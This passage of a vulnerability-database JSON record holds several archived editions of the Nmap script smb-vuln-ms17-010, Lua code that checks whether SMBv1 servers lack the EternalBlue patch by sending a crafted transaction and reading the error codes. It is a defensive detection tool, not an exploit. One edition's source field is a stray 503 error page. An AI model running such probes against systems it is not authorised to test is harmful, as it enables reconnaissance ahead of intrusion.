"key": "type"}, {"hash": "4c6abb610ef2444ff085206adb66b74b", "key": "sourceData"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "immutableFields": [], "lastseen": "2019-05-30T17:05:19", "modified": "2018-06-28T13:40:30", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.5", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n if not result then\n stdnse.debug1(\"Error reading SMB response: %s\", smb_header)\n -- error can happen if an (H)IPS resets the connection\n return false, smb_header\n end\n\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. \".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n vuln.state = vulns.STATE.NOT_VULN\n vuln.check_results = err\n end\n return report:make_output(vuln)\nend\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 1736}, "different_elements": ["cvss3", "cvss2"], "edition": 7, "lastseen": "2019-05-30T17:05:19"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 3, "enchantments": {}, "hash": "d62498d18b954b52be35dc2e4e9cdca7f74815777ed89faa80ee3d07b8787cb6", "hashmap": [{"hash": "2c4f3a4202dff921e10ce885637fccc8", "key": "sourceData"}, {"hash": "2f72f162101e843e99c7a567ce92e387", "key": "modified"}, {"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "dad749029ff9320d6c901dd9054638ab", "key": "href"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "lastseen": "2017-06-28T20:55:23", "modified": "2017-06-27T18:30:33", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.3", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. \".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n if nmap.verbosity() >=2 then\n return err\n end\n end\n return report:make_output(vuln)\nend\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 318}, "differentElements": ["cvss", "cvelist", "sourceData"], "edition": 3, "lastseen": "2017-06-28T20:55:23"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 4, "enchantments": {}, "hash": "730ebaeaf31c9566f4ee498eb2a763209bd65db06998abe2fbdc3c386a29a547", "hashmap": [{"hash": "2f72f162101e843e99c7a567ce92e387", "key": "modified"}, {"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "dad749029ff9320d6c901dd9054638ab", "key": "href"}, {"hash": "20306041cbf4a0dc0e69bcb6a4b00b12", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "lastseen": "2017-08-23T16:41:07", "modified": "2017-06-27T18:30:33", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.3", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html>\n <head>\n <title>503 first byte timeout</title>\n </head>\n <body>\n <h1>Error 503 first byte timeout</h1>\n <p>first byte timeout</p>\n <h3>Guru Mediation:</h3>\n <p>Details: cache-fra1240-FRA 1503491074 699704092</p>\n <hr>\n <p>Varnish cache server</p>\n </body>\n</html>\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 318}, "differentElements": ["cvss", "cvelist", "sourceData"], "edition": 4, "lastseen": "2017-08-23T16:41:07"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "fd4a2d6b539b2b10358da6b71e7b6e46"}, {"key": "href", "hash": "dad749029ff9320d6c901dd9054638ab"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "5e9a31f584635b52c9b5b992d7c89f09"}, {"key": "nmap", "hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5"}, {"key": "published", "hash": "b6f2808e36c38d0e1749fe7cd6221774"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4bf5c8ffb3442a2104d4824ac7f705a8"}, {"key": "sourceData", "hash": "4c6abb610ef2444ff085206adb66b74b"}, {"key": "title", "hash": "3c468ec0659e4b43fe35808e6652bd9f"}, {"key": "type", "hash": "7c0132070a0ef71d542663e9dc1f5dee"}], "hash": "fa027d3602f7146f5362be7cba8e6ce98e136392b1ddb0309305fdb35f3732f6", "viewCount": 1836, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-08-23T12:08:20", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2021-08-23T12:08:20", "rev": 2}}, "objectVersion": "1.6", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft 